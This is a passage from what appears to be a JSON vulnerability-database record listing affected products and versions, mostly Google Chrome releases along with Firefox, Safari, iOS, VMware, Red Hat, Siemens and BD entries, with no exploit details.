        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.31"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.10.140.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1304.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.670.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.378.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.551.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.0"
      },
      {
        "_id": null,
        "model": "sinumerik d sl ncu720.3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "_id": null,
        "model": "sinumerik panels wtih integrated tcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.10"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1037"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.2"
      },
      {
        "_id": null,
        "model": "pyxis parassist system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.2"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1060"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.611.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.547.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.300.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.509.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.387.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.382.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.290.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22"
      },
      {
        "_id": null,
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.33"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.386.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.4"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1056.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.839.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1277.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "18.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.38"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.764.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.97"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.616.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "_id": null,
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.105"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.22"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.45"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.4"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.564.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1046"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.50"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.3.1"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.1.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.5"
      },
      {
        "_id": null,
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201420"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1081.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.868.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.19"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.126.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.220"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.397.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.70"
      },
      {
        "_id": null,
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "_id": null,
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201420"
      },
      {
        "_id": null,
        "model": "ipad air",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.491.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1054.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.535.1"
      },
      {
        "_id": null,
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.2"
      },
      {
        "_id": null,
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1289.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.825.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.814.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.600.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.566.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.3"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.132"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.137"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.877.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.860.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.475.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.102"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1070.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.958.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.1.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.94"
      },
      {
        "_id": null,
        "model": "simatic ipc847c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.415.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.10"
      },
      {
        "_id": null,
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "_id": null,
        "model": "simatic itp1000",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "v23.01.03"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1020.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.614.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.57"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.7"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.344.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.235"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.156.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.111"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.715.0"
      },
      {
        "_id": null,
        "model": "ipod touch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "_id": null,
        "model": "kiestra inoqula standalone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.55"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.505.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1063.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.286.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.15"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.3.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.723.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.105"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.134"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.725.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "15.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.224"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.0"
      },
      {
        "_id": null,
        "model": "chrome",
